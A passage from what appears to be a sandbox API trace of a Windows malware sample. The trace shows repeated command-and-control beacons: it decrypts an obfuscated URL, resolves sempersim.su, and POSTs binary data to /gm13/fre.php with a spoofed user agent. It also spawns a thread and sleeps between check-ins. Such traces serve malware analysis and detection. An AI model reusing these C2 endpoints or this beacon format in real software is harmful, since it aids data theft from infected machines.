sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0285.373] GetProcessHeap () returned 0x620000 [0285.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b6a0 [0285.373] socket (af=2, type=1, protocol=6) returned 0x424 [0285.373] connect (s=0x424, name=0x63ecb8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0285.424] FreeAddrInfoW (pAddrInfo=0x63c320*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ecb8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0285.424] GetProcessHeap () returned 0x620000 [0285.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0285.424] GetProcessHeap () returned 0x620000 [0285.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0285.425] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0285.426] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0285.426] GetProcessHeap () returned 0x620000 [0285.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0285.426] GetProcessHeap () returned 0x620000 [0285.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0285.426] GetProcessHeap () returned 0x620000 [0285.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642ea0 [0285.427] GetProcessHeap () returned 0x620000 [0285.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0285.427] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0285.428] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0285.428] GetProcessHeap () returned 0x620000 [0285.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0285.428] GetProcessHeap () returned 0x620000 [0285.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0285.428] send (s=0x424, buf=0x63a880*, len=237, flags=0) returned 237 [0285.430] send (s=0x424, buf=0x6421e0*, len=159, flags=0) returned 159 [0285.430] GetProcessHeap () returned 0x620000 [0285.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0285.430] recv (in: s=0x424, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0287.080] GetProcessHeap () returned 0x620000 [0287.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0287.080] GetProcessHeap () returned 0x620000 [0287.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ea0 | out: hHeap=0x620000) returned 1 [0287.080] GetProcessHeap () returned 0x620000 [0287.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0287.081] GetProcessHeap () returned 0x620000 [0287.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0287.081] closesocket (s=0x424) returned 0 [0287.082] GetProcessHeap () returned 0x620000 [0287.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6a0 | out: hHeap=0x620000) returned 1 [0287.082] GetProcessHeap () returned 0x620000 [0287.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646320 | out: hHeap=0x620000) returned 1 [0287.083] GetProcessHeap () returned 0x620000 [0287.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643248 | out: hHeap=0x620000) returned 1 [0287.083] GetProcessHeap () returned 0x620000 [0287.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0287.084] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc98) returned 0x424 [0287.086] Sleep (dwMilliseconds=0xea60) [0287.088] GetProcessHeap () returned 0x620000 [0287.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643248 [0287.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0287.089] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0287.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0287.095] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0287.102] GetProcessHeap () returned 0x620000 [0287.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0287.103] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0287.103] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0287.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0287.108] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0287.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0287.110] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.110] GetProcessHeap () returned 0x620000 [0287.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0287.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0287.111] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643248, pdwDataLen=0x19fcfc | out: pbData=0x643248, pdwDataLen=0x19fcfc) returned 1 [0287.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0287.112] CryptDestroyKey (hKey=0x62d710) returned 1 [0287.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0287.113] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0287.113] GetProcessHeap () returned 0x620000 [0287.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ca8 [0287.114] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0287.115] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0287.115] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0287.116] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0287.116] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0287.117] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0287.117] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0287.118] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0287.118] GetProcessHeap () returned 0x620000 [0287.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0287.118] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0287.118] GetProcessHeap () returned 0x620000 [0287.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0287.119] GetProcessHeap () returned 0x620000 [0287.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ca8 | out: hHeap=0x620000) returned 1 [0287.119] GetProcessHeap () returned 0x620000 [0287.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643248 | out: hHeap=0x620000) returned 1 [0287.124] GetProcessHeap () returned 0x620000 [0287.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643488 [0287.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0287.125] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0287.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0287.131] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0287.140] GetProcessHeap () returned 0x620000 [0287.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639038 [0287.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0287.141] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639038*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d210) returned 1 [0287.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0287.142] CryptSetKeyParam (hKey=0x62d210, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0287.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0287.143] CryptSetKeyParam (hKey=0x62d210, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.143] GetProcessHeap () returned 0x620000 [0287.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639038 | out: hHeap=0x620000) returned 1 [0287.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0287.144] CryptDecrypt (in: hKey=0x62d210, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643488, pdwDataLen=0x19fcfc | out: pbData=0x643488, pdwDataLen=0x19fcfc) returned 1 [0287.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0287.145] CryptDestroyKey (hKey=0x62d210) returned 1 [0287.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0287.146] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0287.146] GetProcessHeap () returned 0x620000 [0287.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x6451e0 [0287.146] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0287.147] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0287.147] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0287.147] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0287.148] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0287.148] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0287.148] GetProcessHeap () returned 0x620000 [0287.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0287.148] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c578*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec28*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0287.150] GetProcessHeap () returned 0x620000 [0287.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b550 [0287.150] socket (af=2, type=1, protocol=6) returned 0x428 [0287.150] connect (s=0x428, name=0x63ec28*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0287.207] FreeAddrInfoW (pAddrInfo=0x63c578*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec28*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0287.207] GetProcessHeap () returned 0x620000 [0287.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0287.207] GetProcessHeap () returned 0x620000 [0287.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0287.208] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0287.210] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0287.210] GetProcessHeap () returned 0x620000 [0287.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0287.210] GetProcessHeap () returned 0x620000 [0287.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0287.211] GetProcessHeap () returned 0x620000 [0287.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642fc0 [0287.211] GetProcessHeap () returned 0x620000 [0287.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0287.211] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0287.212] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0287.212] GetProcessHeap () returned 0x620000 [0287.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0287.212] GetProcessHeap () returned 0x620000 [0287.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0287.213] send (s=0x428, buf=0x63a880*, len=237, flags=0) returned 237 [0287.215] send (s=0x428, buf=0x6421e0*, len=159, flags=0) returned 159 [0287.215] GetProcessHeap () returned 0x620000 [0287.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0287.215] recv (in: s=0x428, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0288.782] GetProcessHeap () returned 0x620000 [0288.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0288.782] GetProcessHeap () returned 0x620000 [0288.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642fc0 | out: hHeap=0x620000) returned 1 [0288.783] GetProcessHeap () returned 0x620000 [0288.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0288.783] GetProcessHeap () returned 0x620000 [0288.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0288.783] closesocket (s=0x428) returned 0 [0288.784] GetProcessHeap () returned 0x620000 [0288.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b550 | out: hHeap=0x620000) returned 1 [0288.784] GetProcessHeap () returned 0x620000 [0288.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6451e0 | out: hHeap=0x620000) returned 1 [0288.785] GetProcessHeap () returned 0x620000 [0288.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0288.786] GetProcessHeap () returned 0x620000 [0288.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0288.787] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc9c) returned 0x428 [0288.801] Sleep (dwMilliseconds=0xea60) [0288.807] GetProcessHeap () returned 0x620000 [0288.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643368 [0288.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0288.808] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0288.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0288.815] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0288.823] GetProcessHeap () returned 0x620000 [0288.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0288.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0288.828] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0288.829] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0288.829] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0288.829] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0288.830] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.830] GetProcessHeap () returned 0x620000 [0288.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0288.831] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0288.831] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643368, pdwDataLen=0x19fcfc | out: pbData=0x643368, pdwDataLen=0x19fcfc) returned 1 [0288.831] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0288.832] CryptDestroyKey (hKey=0x62d710) returned 1 [0288.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0288.832] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0288.833] GetProcessHeap () returned 0x620000 [0288.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644d90 [0288.833] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0288.833] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0288.834] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0288.834] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0288.835] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0288.837] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0288.838] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0288.838] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0288.838] GetProcessHeap () returned 0x620000 [0288.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0288.838] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0288.839] GetProcessHeap () returned 0x620000 [0288.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0288.839] GetProcessHeap () returned 0x620000 [0288.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d90 | out: hHeap=0x620000) returned 1 [0288.840] GetProcessHeap () returned 0x620000 [0288.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0288.840] GetProcessHeap () returned 0x620000 [0288.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643128 [0288.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0288.841] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0288.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0288.846] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0288.851] GetProcessHeap () returned 0x620000 [0288.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0288.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0288.852] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0288.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0288.853] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0288.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0288.881] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.881] GetProcessHeap () returned 0x620000 [0288.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0288.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0288.887] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643128, pdwDataLen=0x19fcfc | out: pbData=0x643128, pdwDataLen=0x19fcfc) returned 1 [0288.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0288.891] CryptDestroyKey (hKey=0x62d710) returned 1 [0288.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0288.892] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0288.892] GetProcessHeap () returned 0x620000 [0288.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ed0 [0288.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0288.893] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0288.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0288.893] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0288.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0288.894] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0288.894] GetProcessHeap () returned 0x620000 [0288.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0288.903] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c438*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0288.907] GetProcessHeap () returned 0x620000 [0288.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b690 [0288.907] socket (af=2, type=1, protocol=6) returned 0x42c [0288.907] connect (s=0x42c, name=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0288.958] FreeAddrInfoW (pAddrInfo=0x63c438*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0288.958] GetProcessHeap () returned 0x620000 [0288.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0288.958] GetProcessHeap () returned 0x620000 [0288.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0288.959] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0288.960] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0288.961] GetProcessHeap () returned 0x620000 [0288.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0288.961] GetProcessHeap () returned 0x620000 [0288.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 